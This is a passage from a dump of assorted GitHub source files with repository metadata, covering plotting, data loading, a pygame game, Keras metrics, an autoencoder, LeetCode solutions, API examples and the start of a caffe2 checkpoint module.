stat, data):\n tuning_stat = 'anal'\n tuned_rmse = np.array(f[method + '_' + tuning_stat + '_rmse'])\n tuned_rmse_min_vals = np.min(tuned_rmse, axis=1)\n lag, ens = np.shape(tuned_rmse_min_vals)\n \n stat_rmse = np.array(f[method +'_' + stat + '_rmse'])\n stat_spread = np.array(f[method + '_' + stat + '_spread'])\n\n rmse_vals = np.zeros([lag, ens])\n spread_vals = np.zeros([lag, ens])\n\n for i in range(lag):\n for j in range(ens):\n min_val = tuned_rmse_min_vals[i,j]\n indx = tuned_rmse[i,:,j] == min_val\n\n rmse_vals[i,j] = stat_rmse[i, indx, j]\n spread_vals[i,j] = stat_spread[i, indx, j]\n \n rmse_vals = np.transpose(rmse_vals)\n spread_vals = np.transpose(spread_vals)\n\n return [rmse_vals, spread_vals]\n\nrmse, spread = find_optimal_values(method, stat, f)\n\n\nfig = plt.figure()\nax3 = fig.add_axes([.460, .13, .02, .80])\nax2 = fig.add_axes([.940, .13, .02, .80])\nax1 = fig.add_axes([.530, .13, .390, .80])\nax0 = fig.add_axes([.060, .13, .390, .80])\n\n\n\ncolor_map = sns.color_palette(\"husl\", 101)\nmax_scale = 0.50\nmin_scale = 0.00\n\n\nsns.heatmap(rmse, linewidth=0.5, ax=ax0, cbar_ax=ax3, vmin=min_scale, vmax=max_scale, cmap=color_map)\nsns.heatmap(spread, linewidth=0.5, ax=ax1, cbar_ax=ax2, vmin=min_scale, vmax=max_scale, cmap=color_map)\n\n\nax2.tick_params(\n labelsize=20)\n\nax1.tick_params(\n labelsize=20,\n labelleft=False)\n\nax0.tick_params(\n labelsize=20)\n\nax3.tick_params(\n labelsize=20,\n labelleft=False,\n labelright=True,\n right=True,\n left=False)\nax2.tick_params(\n labelsize=20,\n labelleft=False,\n labelright=True,\n right=True,\n left=False)\n\n\nx_labs = []\nfor i in range(15,44,2):\n x_labs.append(str(i))\n\ny_labs = []\ny_vals = np.arange(1,53, 3)\nfor i in range(len(y_vals)):\n if i % 1 == 0:\n y_labs.append(str(y_vals[i]))\n else:\n y_labs.append('')\n\n\ny_labs = y_labs[::-1]\n\nax1.set_xticks(range(0,15))\nax0.set_xticks(range(0,15))\nax1.set_xticklabels(x_labs)\nax0.set_xticklabels(x_labs)\n#ax1.set_ylim([9,1])\n#ax0.set_ylim([9,1])\nax0.set_yticks(range(18))\nax0.set_yticklabels(y_labs, va='bottom')\nax1.set_yticks(range(18))\n\nif stat == 'anal':\n stat = 'smoother'\n\nelif stat == 'filt':\n stat = 'filter'\n\nelif stat == 'fore':\n stat = 'forecast'\n\nplt.figtext(.2525, .05, stat + ' RMSE', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.7225, .05, stat + ' spread', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.015, .52, r'Lag length', horizontalalignment='center', verticalalignment='center', fontsize=24, rotation='90')\nplt.figtext(.50, .04, r'Ensemble size', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.5, .97, method + ', ' + ' mda ' + mda + ', ' + stat + ' statistics, optimally tuned inflation, shift 1',\n horizontalalignment='center', verticalalignment='center', fontsize=24)\n\n\nplt.show()\n","repo_name":"cgrudz/DataAssimilationBenchmarks.jl","sub_path":"src/analysis/state_smoother/plt_smoother_state_rmse_spread_2_pane.py","file_name":"plt_smoother_state_rmse_spread_2_pane.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"10326716713","text":"import csv\nimport numpy as np\nfrom configparser import ConfigParser\n\nfrom vehicle import Vehicle\nfrom visit import Visit\n\n\nclass Globals:\n\n def __init__(self):\n self.list_visits = []\n self.distances = None\n self.times = None\n self.vehicle_model = None\n self.config = ConfigParser()\n\n def define(self, folder):\n \"\"\"\n Affecte les valeurs globales list_visits (liste de visites), distances (matrice des distances),\n times (matrice des temps), vehicle_model (modèle de véhicule).\n\n :param folder: Chemin du dossier où sont placés les fichiers de configuration\n visits.csv, distances.txt, times.txt et vehicle.ini\n \"\"\"\n with open(folder + 'visits.csv', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n self.list_visits.append(Visit(int(row['visit_id']), row['visit_name'],\n row['visit_lat'], row['visit_lon'], int(row['demand'])))\n\n self.distances = np.loadtxt(folder + \"distances.txt\")\n self.times = np.loadtxt(folder + \"times.txt\")\n self.config.read(folder + \"vehicle.ini\")\n self.vehicle_model = Vehicle(\n self.getIntFromIni(\"max_dist\"),\n self.getIntFromIni(\"capacity\"),\n self.getIntFromIni(\"charge_fast\"),\n self.getIntFromIni(\"charge_medium\"),\n self.getIntFromIni(\"charge_slow\"),\n self.getStrFromIni(\"start_time\"),\n self.getStrFromIni(\"end_time\")\n )\n\n def getIntFromIni(self, value: str):\n return self.config.getint(\"Vehicle\", value)\n\n def getStrFromIni(self, value: str):\n return self.config.get(\"Vehicle\", value)\n","repo_name":"Remy-Varinier/TP_Energie","sub_path":"TP/main/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37128846355","text":"from urllib.parse import urlparse\n\nimport re\nimport requests\nfrom markdown.util import etree\n\nfrom kazimir.Token import UrlToken, is_url\n\npattr = re.compile(r'https?://(www\\.)?instagram\\.com/p/(?P[\\w\\d]+)/?(.*)$')\n\n\nclass InstagramToken(UrlToken):\n @staticmethod\n def test(data: str):\n if not is_url(data):\n return False\n\n url = urlparse(data)\n return url.netloc in ['www.instagram.com', 'instagram.com']\n\n def __init__(self, data: str) -> None:\n super().__init__(data=data)\n self.name = 'instagram'\n\n async def get_data(self):\n m = pattr.match(self.data)\n embed = None\n if m:\n m = m.group('media')\n embed = await embed_instagram(m)\n\n return {\n 'url': self.data,\n 'embed': embed,\n }\n\n\nasync def embed_instagram(media):\n \"\"\"\n
\n \n
\n \"\"\"\n\n url = f'https://api.instagram.com/oembed?url=http://instagr.am/p/{media}&hidecaption=true&omitscript=true'\n req = requests.get(url)\n if req.status_code == 200:\n html = req.json()['html']\n html = fix_html(html)\n\n return html\n # i = etree.fromstring(html)\n\n # obj = etree.Element('div')\n # obj.set('class', \"kazimir__embed\")\n # obj.append(i)\n # return etree.tostring(obj).decode()\n else:\n raise Exception(\n 'Failed to compile Instagram {media}: Status Code: {status}'.format(\n media=media, status=req.status_code)\n )\n\n\ndef fix_html(html: str):\n return html.replace('data-instgrm-captioned', 'data-instgrm-captioned=\"\"')\n","repo_name":"tmshv/hudozka","sub_path":"modules/sync/kazimir/InstagramToken.py","file_name":"InstagramToken.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1661573130","text":"# can judge it's immutable or not,return True meaming for immutable\ndef fixed(o):\n try :\n hash(o)\n except TypeError:\n return False and print('False')\n return True and print('True')\n\nf1 = ('city','country',[1,2])\nf2 = ('city','country',(1,2))\n\nfixed(f1)\nfixed(f2)\n\nf1[-1].append(233)\nprint(f1)","repo_name":"DRAGONINWAVE/for_little_sun","sub_path":"mutable_tuples.py","file_name":"mutable_tuples.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73034132213","text":"import sys\nimport re\n\n\n_VERSION_MARKER = re.compile('_py(?P\\d)')\n\n\ndef pytest_ignore_collect(path, config):\n \"\"\"\n Ignore tests that end with _pyX, where X does not equal this\n interpreter's major version.\n \"\"\"\n filename = path.basename\n modulename = filename.split('.', 1)[0]\n match = _VERSION_MARKER.search(modulename)\n return match and not int(match.group('version')) == sys.version_info[0]\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mahmoud_boltons/boltons-master/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4579216904","text":"import os,sys,pygame\nfrom pygame.locals import *\nimport gameobjects, config\nimport random\n\n\n\n\nclass GameState:\n \n def handle(self,event):\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n sys.exit()\n \n def firstDisplay(self, screen):\n screen.fill(config.background_colour)\n pygame.display.flip()\n \n def display(self,screen):\n pass\n\nclass Level(GameState):\n def __init__(self, number = 1):\n self.number = number\n self.remaining = config.weights_per_level\n \n speed = config.drop_speed\n speed += (self.number-1) * config.speed_increase\n \n self.weight = gameobjects.Weight(speed)\n self.botley = gameobjects.Botley()\n both = self.weight, self.botley\n self.sprites = pygame.sprite.RenderUpdates(both)\n def update(self, game):\n self.sprites.update()\n \n if self.botley.touches(self.weight):\n pygame.mixer.init()\n pygame.mixer.Sound(config.soundfile).play()\n \n \n game.nextState = GameOver()\n elif self.weight.landed:\n self.weight.reset()\n sounds = random.choice(config.escapesounds)\n pygame.mixer.init()\n pygame.mixer.Sound(sounds).play()\n self.remaining -= 1\n if self.remaining == 0:\n game.nextState = LevelCleared(self.number)\n def display(self,screen):\n screen.fill(config.background_colour)\n updates = self.sprites.draw(screen)\n pygame.display.update(updates)\n \nclass Paused(GameState):\n \n finished = 0\n image = config.gamepaused\n # add your own text below\n text = '' \n def handle(self,event):\n GameState.handle(self, event)\n if event.type in [MOUSEBUTTONDOWN, KEYDOWN]:\n self.finished = 1\n def update(self,game):\n if self.finished:\n game.nextState = self.nextState()\n \n def firstDisplay(self,screen):\n screen.fill(config.background_colour)\n font = pygame.font.init()\n font = pygame.font.Font(None, config.font_size)\n lines = self.text.strip().splitlines()\n \n height = len(lines) * font.get_linesize()\n \n center,top = screen.get_rect().center\n top -= height // 2\n \n if self.image:\n \n image = pygame.image.load(self.image).convert()\n r = image.get_rect()\n top += r.height //2\n r.midbottom = center, top-20\n screen.blit(image,r)\n \n antialias = 1\n black = 0, 0, 0\n \n for line in lines:\n text = font.render(line.strip(), antialias, black)\n r = text.get_rect()\n r.midtop = center,top\n screen.blit(text,r)\n top += font.get_linesize()\n \n pygame.display.flip()\n \nclass Information(Paused):\n image = config.ready\n nextState = Level\n # insert whatever text you want below\n text = ''' \\n\\n'''\n pygame.mixer.init()\n pygame.mixer.Sound(config.cry).play()\nclass StartUp(Paused):\n nextState = Information\n image = config.startupimage\n text = \"zomgevadeOverlawd\\n\\n Evade the Wakoopa Overlawd, Meh Guy!\"\n \nclass LevelCleared(Paused):\n def __init__(self,number):\n self.number = number\n self.text = 'Levels cleared: %d' % self.number\n sounds2 = random.choice(config.gameoversounds)\n pygame.mixer.init()\n pygame.mixer.Sound(sounds2).play()\n \n def nextState(self): \n return Level(self.number+1)\nclass GameOver(Paused):\n \n image = config.out\n nextState = Level\n \n text = \"Aw shucks :( Click me?\"\n \nclass Game:\n def __init__(self,*args):\n path = os.path.abspath(args[0])\n dir = os.path.split(path)[0]\n os.chdir(dir) \n self.state = None\n self.nextState = StartUp()\n def run(self):\n flag = 0\n if config.full_screen:\n flag = FULLSCREEN\n screen_size = config.screen_size\n screen = pygame.display.set_mode(screen_size,flag)\n pygame.display.set_caption('LOLZORS')\n pygame.mouse.set_visible(True)\n while True:\n #if self.state != self.nextState:\n self.state = self.nextState\n self.state.firstDisplay(screen)\n for event in pygame.event.get():\n self.state.handle(event)\n self.state.update(self)\n self.state.display(screen)\n \n \n \nif __name__ == '__main__':\n game = Game(*sys.argv)\n game.run()\n","repo_name":"PrasVG/SimpleSprites","sub_path":"simplesprites.py","file_name":"simplesprites.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9374897789","text":"#!/usr/bin/python3\n'''\nCount how many lines in the target files have zero, one, two, ... field\n\nArgs:\n path: path to the target file\n\nOutput:\n print the output to the terminal e.g.\n linux> python3 assertdata.py clctraining-v3/dtal-exp-GEM4-1/output/4-REMOVE-DM-RE-FS.tsv\n\n zero: 3649\n one: 0\n two: 0\n three: 0\n four: 0\n five+: 69248\n\n'''\nimport sys\n\ndef main():\n # path = '/home/alta/BLTSpeaking/ged-pm574/artificial-error/lib/tsv/ami1.train.ged.tsv'\n if len(sys.argv) != 2:\n print('Usage: python3 assertdata.py path')\n return\n\n path = sys.argv[1]\n\n zero = 0\n one = 0\n two = 0\n three = 0\n four = 0\n fivemore = 0\n with open(path) as file:\n for line in file:\n n = len(line.split())\n if n == 0:\n zero += 1\n elif n == 1:\n one += 1\n elif n == 2:\n two += 1\n elif n == 3:\n three += 1\n elif n == 4:\n four += 1\n else:\n fivemore += 1\n print(\"zero: \", zero)\n print(\"one: \", one)\n print(\"two: \", two)\n print(\"three: \", three)\n print(\"four: \", four)\n print(\"five+: \", fivemore)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"potsawee/py-tools-ged","sub_path":"assertdata.py","file_name":"assertdata.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15796390554","text":"import random\nimport numpy as np\nfrom keras import backend as K\nfrom tensorflow.keras.callbacks import Callback\nfrom sklearn.metrics import f1_score, recall_score, precision_score\nfrom data_loader import DataLoader\n\nclass Metrics(Callback):\n def __init__(self):\n super(Callback, self).__init__()\n self.validation_data = DataLoader(1,'/content/ReplayAttackSample/valid')\n\n def on_train_begin(self, logs={}):\n self.val_f1s = []\n self.val_recalls = []\n self.val_precisions = []\n\n def on_epoch_end(self, epoch, logs={}):\n #pick randomly 100 files in Validation data to evaluate model to avoid OOM\n val_predicts = []\n val_targets = []\n idx_sample = random.sample(range(len(self.validation_data)), 50)\n for idx in idx_sample:\n val_sub_video, val_label = self.validation_data[idx] #240,320,3,10; ,1\n val_predicts.append(np.argmax(self.model.predict(val_sub_video), axis = 1)[0])\n val_targets.append(val_label[0])\n # print(val_label[0])\n # print(np.argmax(self.model.predict(val_sub_video), axis = 1)[0].astype(float))\n\n # print(np.unique(np.array(val_predicts)))\n # print(np.unique(np.array(val_targets)))\n\n _val_f1 = f1_score(val_targets, val_predicts, zero_division = 1)\n _val_recall = recall_score(val_targets, val_predicts, zero_division = 1)\n _val_precision = precision_score(val_targets, val_predicts, zero_division = 1)\n\n self.val_f1s.append(_val_f1)\n self.val_recalls.append(_val_recall)\n self.val_precisions.append(_val_precision)\n print (' — val_f1: ',_val_f1,' — val_precision: ',_val_precision, ' — val_recall: ',_val_recall)","repo_name":"kun09-tker/FaceSpoofingDetection","sub_path":"Modelling/metrics_f1.py","file_name":"metrics_f1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74593035571","text":"from src.dataset_loaders import load_font_data\nfrom src.activation_functions import get_activation_function\nfrom src.optimization_methods import get_optimization_method\nfrom src.autoencoder import denoising_autoencoder\nfrom src.multilayer_perceptron import predict\nfrom src.utils import (\n create_image,\n deserialize_weights,\n get_batch_size,\n serialize_weights,\n)\nfrom src.noise import flipping_noise\n\nimport json\n\n\ndef main():\n data = load_font_data()\n\n # Flatten the matrix into a vector\n data = data.reshape((data.shape[0], -1))\n\n with open(\"config.json\", \"r\") as f:\n config = json.load(f)\n\n hidden_layer_sizes = config[\"hidden_layers\"]\n latent_space_size = config[\"latent_space_size\"]\n\n target_error = config[\"target_error\"]\n max_epochs = config[\"max_epochs\"]\n\n noise_probability_training = config[\"noise_probability_training\"]\n noise_probability_testing = config[\"noise_probability_testing\"]\n\n batch_size = get_batch_size(config, data.shape[0])\n\n (\n activation_function,\n activation_derivative,\n activation_normalize,\n ) = get_activation_function(\n config[\"activation\"][\"function\"], config[\"activation\"][\"beta\"]\n )\n\n optimization_method = get_optimization_method(config[\"optimization\"])\n\n if config[\"load_weights\"]:\n weights = deserialize_weights(config[\"weights_file\"])\n else:\n weights, errors_per_epoch, training_data = denoising_autoencoder(\n data,\n hidden_layer_sizes,\n latent_space_size,\n target_error,\n max_epochs,\n batch_size,\n activation_function,\n activation_derivative,\n optimization_method,\n noise_probability_training,\n )\n\n original_data = data\n testing_data = flipping_noise(data, noise_probability_testing)\n\n original_fonts = data.reshape((-1, 7, 5))\n training_fonts = training_data.reshape((-1, 7, 5))\n testing_fonts = testing_data.reshape((-1, 7, 5))\n\n create_image(original_fonts, \"original.png\", (7, 5))\n create_image(training_fonts, \"training.png\", (7, 5))\n create_image(testing_fonts, \"testing.png\", (7, 5))\n\n reconstructed_with_original_fonts = []\n reconstructed_with_training_fonts = []\n reconstructed_with_testing_fonts = []\n\n for original_sample, training_sample, testing_sample in zip(\n original_data, training_data, testing_data\n ):\n reconstructed_with_original_sample = predict(\n original_sample, weights, activation_function\n )\n reconstructed_with_training_sample = predict(\n training_sample, weights, activation_function\n )\n reconstructed_with_testing_sample = predict(\n testing_sample, weights, activation_function\n )\n\n reconstructed_with_original_font = (\n reconstructed_with_original_sample.reshape((7, 5))\n )\n reconstructed_with_training_font = (\n reconstructed_with_training_sample.reshape((7, 5))\n )\n reconstructed_with_testing_font = reconstructed_with_testing_sample.reshape(\n (7, 5)\n )\n\n reconstructed_with_original_fonts.append(reconstructed_with_original_font)\n reconstructed_with_training_fonts.append(reconstructed_with_training_font)\n reconstructed_with_testing_fonts.append(reconstructed_with_testing_font)\n\n create_image(\n reconstructed_with_original_fonts, \"reconstructed_with_original.png\", (7, 5)\n )\n create_image(\n reconstructed_with_training_fonts, \"reconstructed_with_training.png\", (7, 5)\n )\n create_image(\n reconstructed_with_testing_fonts, \"reconstructed_with_testing.png\", (7, 5)\n )\n\n if config[\"save_weights\"]:\n serialize_weights(weights, config[\"weights_file\"])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ImNotGone/sia-tp5","sub_path":"ej1b.py","file_name":"ej1b.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940153865","text":"\"\"\"\nA sequence consists of integer numbers and ends with the number 0. Determine how many elements of this sequence are greater than their neighbours above. \n\nFor example, on input\n3\n2\n3\n1\n4\n4\n3\n0\noutput must be\n2\n\"\"\"\ncounter = 0\n\nnum1 = int(input())\nwhile True:\n num2 = int(input())\n if num2 == 0:\n break\n if num2 > num1:\n counter += 1\n num1 = num2\n\nprint(counter)\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POP1 Part-time/Session 2 Problem 08: Number of elements greater to previous one.py","file_name":"Session 2 Problem 08: Number of elements greater to previous one.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3488564551","text":"#\n# @lc app=leetcode.cn id=76 lang=python3\n#\n# [76] 最小覆盖子串\n#\n\n# @lc code=start\nfrom collections import defaultdict\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n\n window = defaultdict(int)\n need = defaultdict(int)\n for c in t:\n need[c] += 1\n\n valid = 0 # 表示窗口中满足need条件的字符串的字符个数\n left, right = 0, 0\n\n start = 0 # 记录找到的字符串的开始下标\n length = len(s) + 1\n\n while right < len(s):\n c = s[right]\n # 移动窗口\n right += 1\n if c in need:\n # 更新窗口里的数\n window[c] += 1\n if need[c] == window[c]:\n valid += 1\n\n # 判断左侧是不是要收缩了(当前是否已经满足条件了)\n while valid == len(need):\n # 更新最小子串\n if (right - left) < length:\n start = left\n length = right - left\n\n d = s[left]\n left += 1\n # 将最左侧的数据从window中移除\n if d in need:\n if need[d] == window[d]:\n valid -= 1\n window[d] -= 1\n if length != len(s) + 1:\n return s[start : start + length]\n return \"\"\n\n def test(self, s=\"ADOBECODEBANC\", t=\"ABC\"):\n return self.minWindow(s, t)\n\n\n# @lc code=end\n\n","repo_name":"Ehco1996/leetcode","sub_path":"labuladong/开始之前/swindow/76.最小覆盖子串.py","file_name":"76.最小覆盖子串.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"9796420963","text":"class Foo:\n @property\n def bar(self):\n \"\"\"The bar attribute\"\"\"\n return self.__dict__[\"bar\"]\n\n @bar.setter\n def bar(self, value):\n self.__dict__[\"bar\"] = value\n\n\nif __name__ == \"__main__\":\n help(Foo.bar)\n help(Foo)\n","repo_name":"tinylambda/keep","sub_path":"books/fp/ch19/ch19_12.py","file_name":"ch19_12.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24686714041","text":"# Dependencies\nimport requests\nimport json\n\n# Google developer API key\nfrom config import api_key\n\n# Target city\ntarget_city = \"Boise, Idaho\"\n\n# Build the endpoint URL\ntarget_url = ('https://maps.googleapis.com/maps/api/geocode/json?'\n 'address={0}&key={1}').format(target_city, api_key)\n\n# Run a request to endpoint and convert result to json\ngeo_data = requests.get(target_url).json()\n\n# Print the json\nprint(geo_data)\n\n\n# Print the json (pretty printed)\nprint(json.dumps(geo_data, indent=4, sort_keys=True))\n\n# Extract latitude and longitude\nlat = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\nlng = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n# Print the latitude and longitude\nprint('''\n City: {0}\n Latitude: {1}\n Longitude: {2}\n '''.format(target_city, lat, lng))","repo_name":"GilbyScarChest/Coding_Templates","sub_path":"Templates/API's/python-API.py","file_name":"python-API.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16132072875","text":"from Main_Assignment_Python_Track.ExcelUtility import ExcelUtils\nimport datetime\n\n\n\nclass WrongColumName(Exception):\n pass\n\n\nclass Admin(ExcelUtils):\n def __init__(self):\n super().__init__()\n ExcelUtils()\n\n def admin_login(self):\n\n admin_name = str(input(\"Enter the admin Username\"))\n admin_password = str(input(\"enter Password\"))\n for i in range(1, ExcelUtils.Total_row + 1):\n\n if ExcelUtils.sheet.cell(i, 1).value == admin_name:\n if ExcelUtils.sheet.cell(i, 2).value == admin_password:\n return\"Login Successful\"\n else:\n return \"wrong_Password\"\n return \"Wrong Admin_Username\"\n\n def editmovie(self):\n try:\n movie_name = str(input(\"Enter Movie name\"))\n for i in range(1, ExcelUtils.Total_main_database_row+1):\n if ExcelUtils.database.cell(i, 1).value == movie_name:\n local_dict = {\"Title\": \"A\", \"Genre\": \"B\", \"Length in hours\": \"C\", \"Cast\": \"D\", \"Director\": \"E\",\n \"Admin_rating\": \"F\", \"No_of Shows\": \"H\", \"First Show\": \"I\",\n \"Interval Time in minutes\": \"J\", \"Gap Between Shows in minutes\": \"K\", \"Capacity\": \"L\"}\n print(list(local_dict.keys()))\n editable = str(input(\"enter what you want to edit \"))\n if editable not in local_dict:\n raise WrongColumName\n edit = str(input(\"enter the edit \"))\n editing_cell = ExcelUtils.database[local_dict[editable]+f'{i}']\n editing_cell.value = edit\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(f'{editable} is Edited Successfully')\n except WrongColumName:\n print(\"Please Enter Correct Column name\")\n except Exception:\n print()\n\n def add_movie(self):\n try:\n #for i in range(1, ExcelUtils.Total_main_database_row):\n print(\"Please fill the below Requirements\")\n local_dict = {\"Title\": \"A\", \"Genre\": \"B\", \"Length\": \"C\", \"Cast\": \"D\", \"Director\": \"E\",\n \"Admin_rating\": \"F\", \"No_of Shows\": \"H\", \"First Show\": \"I\",\n \"Interval Time\": \"J\", \"Gap Between Shows\": \"K\", \"Capacity\": \"L\", \"Available Seats\":\"N\"}\n for j in local_dict:\n edit = str(input(f'{j}:'))\n cell = ExcelUtils.database[f'{local_dict[j]}{ExcelUtils.Total_main_database_row + 1}']\n cell.value = edit\n ExcelUtils.workbook.save(ExcelUtils.url)\n\n print(\"Movie added Successfully\")\n except Exception:\n print(\"Something Went Wrong\")\n\n def deleteMovie(self):\n try:\n movie_name = str(input(\"Enter the Movie you want to delete\"))\n index = 0\n for i in range(1, ExcelUtils.Total_main_database_row):\n if ExcelUtils.database.cell(i, 1).value == movie_name:\n index = i\n ExcelUtils.database.delete_rows(index, 1)\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(f'{movie_name} is deleted successfully')\n except Exception:\n print(\"Something Went Wrong or may movie is not present\")\n\n def calculate_timing(self):\n try:\n ExcelUtils()\n local_dict = {\"length\":\"C\", \"No_of_show\":\"H\", \"first_show\":\"I\", \"Interval time\":\"J\", \"Gap\":\"K\"}\n retained_dict={}\n for i in local_dict.keys():\n values = ExcelUtils.database[f'{local_dict[i]}{ExcelUtils.Total_main_database_row}'].value\n if values not in retained_dict:\n retained_dict[i] = values\n timing_list = []\n start_time = datetime.timedelta(hours=int(retained_dict[\"first_show\"]))\n interval_time = datetime.timedelta(hours=0 ,minutes=int(retained_dict[\"Interval time\"]))\n movie_length_list = retained_dict[\"length\"].split('.')\n movie_length = datetime.timedelta(hours=int(movie_length_list[0]), minutes=int(movie_length_list[1]))\n gap = datetime.timedelta(hours=0,minutes=int(retained_dict[\"Gap\"]))\n\n for i in range(0, int(float(retained_dict[\"No_of_show\"]))):\n timing_list.append(f'{start_time}-{start_time + movie_length + interval_time}')\n start_time = start_time + movie_length + interval_time + gap\n timing_list = \",\".join(map(str, timing_list))\n time_column = ExcelUtils.database[f'G{ExcelUtils.Total_main_database_row}']\n time_column.value = timing_list\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(\"time slots added successfully\")\n except Exception as e:\n print(e)\n\n\n","repo_name":"prabhat-deloitte/HU_PYTHON_TRACK","sub_path":"Main_Assignment_Python_Track/Admin_Class.py","file_name":"Admin_Class.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19767317362","text":"## @package checkpoint\n# Module caffe2.python.checkpoint\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport logging\nfrom caffe2.python import core, context\nfrom caffe2.python.net_builder import ops\nfrom caffe2.python.task import Node, Task, TaskGroup, TaskOutput, WorkspaceType\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# The name of the special net that is used to store all the blob names in the\n# workspace.\n__BLOB_NAMES_NET__ = 'get_blob_list'\n\n@context.define_context()\nclass Job(object):\n \"\"\"\n A Job defines three TaskGroups: the `init_group`, the `epoch_group` and the\n `exit_group` which will be run by a JobRunner.\n\n The `init_group` will be run only once at startup. Its role is to\n initialize globally persistent blobs such as model weights, accumulators\n and data file lists.\n\n The `epoch_group` will be run in a loop after init_group. The loop will\n exit when any of the stop signals added with `add_stop_signal` is True\n at the end of an epoch.\n\n The `exit_group` will be run only once at the very end of the job, when one\n of the stopping criterias for `epoch_group` was met. The role of this group\n is save the results of training in the end of the job.\n\n Jobs are context-driven, so that Tasks can be added to the active Job\n without having to explicitly pass the job object around.\n\n Example of usage:\n\n def build_reader(partitions):\n with Job.current().init_group:\n reader = HiveReader(init_reader, ..., partitions)\n Task(step=init_reader)\n with Job.current().epoch_group:\n limited_reader = ReaderWithLimit(reader, num_iter=10000)\n data_queue = pipe(limited_reader, num_threads=8)\n Job.current().add_stop_signal(limited_reader.data_finished())\n return data_queue\n\n def build_hogwild_trainer(reader, model):\n with Job.current().init_group:\n Task(step=model.param_init_net)\n with Job.current().epoch_group:\n pipe(reader, processor=model, num_threads=8)\n with Job.current().exit_group:\n Task(step=model.save_model_net)\n\n with Job() as job:\n reader = build_reader(partitions)\n model = build_model(params)\n build_hogwild_trainer(reader, model)\n \"\"\"\n def __init__(self,\n init_group=None, epoch_group=None,\n exit_group=None, stop_signals=None,\n nodes_to_checkpoint=None):\n self.init_group = init_group or TaskGroup(\n workspace_type=WorkspaceType.GLOBAL)\n self.epoch_group = epoch_group or TaskGroup()\n self.exit_group = exit_group or TaskGroup()\n self.stop_signals = stop_signals or []\n self._nodes_to_checkpoint = nodes_to_checkpoint\n\n def nodes_to_checkpoint(self):\n if self._nodes_to_checkpoint:\n return self._nodes_to_checkpoint\n else:\n return self.init_group.used_nodes()\n\n def compile(self, session_class):\n return Job(\n init_group=session_class.compile(self.init_group),\n epoch_group=session_class.compile(self.epoch_group),\n exit_group=session_class.compile(self.exit_group),\n stop_signals=self.stop_signals,\n nodes_to_checkpoint=self.nodes_to_checkpoint())\n\n def __enter__(self):\n self.epoch_group.__enter__()\n return self\n\n def __exit__(self, *args):\n self.epoch_group.__exit__()\n\n def add_stop_signal(self, output):\n if isinstance(output, core.BlobReference):\n t = Task(outputs=[output], group=self.epoch_group)\n output = t.outputs()[0]\n assert isinstance(output, TaskOutput)\n self.stop_signals.append(output)\n\n\nclass CheckpointManager(object):\n \"\"\"\n Controls saving and loading of workspaces on every epoch boundary of a job.\n If a CheckpointManager instance is passed to JobRunner, then JobRunner will\n call `init`, `read` and `save` at different moments in between epoch runs.\n \"\"\"\n def __init__(self, db, db_type):\n self._db = db\n self._db_type = db_type\n # make sure these blobs are the first in the checkpoint file.\n self._net = core.Net('!!checkpoint_mngr')\n self._blob_names = self._net.AddExternalInput('blob_names')\n self._names_output = None\n\n def init(self, nodes=None, retrieve_from_epoch=None):\n \"\"\"\n Build a Task that will be run once after the job's `init_group` is run.\n This task will determine which blobs need to be checkpointed.\n If retrieve_from_epoch is not None, then the checkpoint metadata is\n retrieved from a previously saved checkpoint.\n \"\"\"\n assert nodes is None or len(nodes) == 1, (\n 'CheckpointManager only supports single node.')\n with 